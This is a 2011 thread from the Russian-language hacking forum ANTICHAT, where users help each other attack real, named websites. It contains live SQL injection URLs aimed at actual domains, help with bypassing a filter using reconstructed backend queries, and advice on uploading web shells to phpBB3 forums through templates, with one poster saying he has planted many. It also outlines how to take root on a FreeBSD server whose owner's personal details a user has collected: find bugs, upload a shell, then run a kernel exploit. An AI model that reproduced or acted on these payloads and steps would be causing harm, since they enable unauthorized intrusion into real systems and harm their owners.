ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
07.03.2011, 14:21
|
|
Guest
Сообщений: n/a
Провел на форуме:
8829
Репутация:
-3
|
|
Лично для себя захотелось узнать, возможно ли провести sql'ку на
http://www.aratta-ukraine.com/sacred_ua.php?id=9999999
объясните плиз за +
|
|
|
|
07.03.2011, 15:08
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944
Репутация:
1550
|
|
Сообщение от Jer1cho
Jer1cho said:
Существует ли другой способ залить шелл в phpbb3 не используя стили?
шаблоны
|
|
|
07.03.2011, 15:22
|
|
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
Провел на форуме:
111014
Репутация:
8
|
|
Какая здесь БД?
http://www.row2k.com/polls/index.cfm?cat=college&ID=-265+%6f%72%64%65%72+by+5+--+&type=USRowing%20Collegiate%20Poll
|
|
|
|
07.03.2011, 16:52
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
Сообщение от FlaktW
FlaktW said:
Какая здесь БД?
http://www.row2k.com/polls/index.cfm?cat=college&ID=-265+%6f%72%64%65%72+by+5+--+&type=USRowing%20Collegiate%20Poll
MSSQL
|
|
|
|
07.03.2011, 18:54
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944
Репутация:
1550
|
|
Сообщение от Jer1cho
Jer1cho said:
Ну я это и имел ввиду, в шаблонах при правке выдается ошибка, специфичная для первых версий bb3, ждать пока админ обновит форум нет желания)), поэтому ищу другой способ.
залил кучу шеллов таким образом на пхпбб3, никогда не появлялась ошибка..либо ты что то неправильно делаешь (что мало вероятно, так как там нет ничего сложного), либо мне не попадались такие форумы, кидай в пм посмотрим что сделать можно..
|
|
|
|
07.03.2011, 21:07
|
|
Guest
Сообщений: n/a
Провел на форуме:
5967
Репутация:
0
|
|
есть один сайт, расположенный на сервере, знаю на каком , знаю где находится датацентр, владельца доменных имён, его емайлы,знаю ФИО, мобильник, и какие фирмы на нём)) знаю что админ не закрыл доступ с разных айпи к серваку через ssh, надо узнать root пароль.
просканил сервак на файлы имеющиеся на нём.
одни их них
robots.txt HTTP 200 OK
.htaccess 302 Found
.htconfig 302 Found
.htpasswd 302 Found
однако конечно же они закрыты) может быть могут быть полезными
некоторые папки открытые, некоторые закрытые.
поставил BT4 r2, с чего Начать?)))
сайт проверять на дыры бесполезно. написан достаточно хорошо.
OS-FreeBSD на серваке
|
|
|
|
07.03.2011, 21:18
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944
Репутация:
1550
|
|
Сообщение от kAtze
kAtze said:
есть один сайт, расположенный на сервере, знаю на каком , знаю где находится датацентр, владельца доменных имён, его емайлы,знаю ФИО, мобильник, и какие фирмы на нём)) знаю что админ не закрыл доступ с разных айпи к серваку через ssh, надо узнать root пароль.
просканил сервак на файлы имеющиеся на нём.
одни их них
robots.txt HTTP 200 OK
.htaccess 302 Found
.htconfig 302 Found
.htpasswd 302 Found
однако конечно же они закрыты) может быть могут быть полезными
некоторые папки открытые, некоторые закрытые.
поставил BT4 r2, с чего Начать?)))
сайт проверять на дыры бесполезно. написан достаточно хорошо.
OS-FreeBSD на серваке
ну рут пароль к сайту вряд ли относится каким то боком...в папке сайта ты 99,99% не найдешь ничего что может тебе дать рута на серванте..ищи баги, заливай шелл..узнавай версию ядра..юзай сплоит..получай рута..
|
|
|
|
08.03.2011, 14:22
|
|
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
Провел на форуме:
111014
Репутация:
8
|
|
Не могу обойти фильтрацию.
http://www.funade.jp/english/course/detail.php?id=-46+union+select+1,2,3,4,5,6,7,8,9,10,11+--+
|
|
|
|
08.03.2011, 15:06
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281
Репутация:
1177
|
|
Сообщение от FlaktW
FlaktW said:
Не могу обойти фильтрацию.
http://www.funade.jp/english/course/detail.php?id=-46+union+select+1,2,3,4,5,6,7,8,9,10,11+--+
Там двойной запрос:
http://www.funade.jp/english/course/detail.php?id=-46+union+select+1,2,3,4,5,6,7,8,9,10,11--+
Код:
Code:
SELECT * FROM root where p_id=-46 union select 1,2,3,4,5,6,7,8,9,10,11-- order by rank
http://www.funade.jp/english/course/detail.php?id=-46+union+select+1,2,3,4,5,6,7,8,9,10--+
Код:
Code:
SELECT * FROM `place` WHERE id=-46 union select 1,2,3,4,5,6,7,8,9,10-- order by up_date
Либо крути, как слепую с выводом в ошибку, либо: /showpost.php?p=1047515&postcount=48
|
|
|
|
08.03.2011, 16:18
|
|
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
Провел на форуме:
111014
Репутация:
8
|
|
Сообщение от Tigger
Tigger said:
либо: /showpost.php?p=1047515&postcount=48
Так как написано в этой статье вывести, не получается.
Сейчас попробую вывести через ошибку.
|
|
|
|
|
|
|
|
Здесь присутствуют: 4 (пользователей: 0 , гостей: 4)
|
|
|
|
Похожие темы
Линейный вид
